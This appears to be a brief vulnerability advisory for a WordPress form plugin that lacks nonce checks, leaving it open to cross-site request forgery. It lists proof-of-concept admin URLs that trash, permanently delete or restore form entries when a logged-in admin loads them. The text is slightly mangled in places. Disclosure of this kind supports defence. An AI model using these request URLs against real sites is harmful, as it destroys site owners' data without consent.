The plugin does not enforce nonce checks which could allow attackers to make a logged in admin or editor delete and restore arbitrary form entries via CSRF attacks
Single entry trash: https://example.com/wp-admin/admin.php?page=vfb-entries&action;=trash&entry;=2 Since entry permanent deletion: https://example.com/wp-admin/admin.php?page=vfb-entries&action;=delete&entry;=3 Single entry restoration: https://example.com/wp-admin/admin.php?page=vfb-entries&action;=restore&entry;=3 Bulk Trash Bulk permanent delete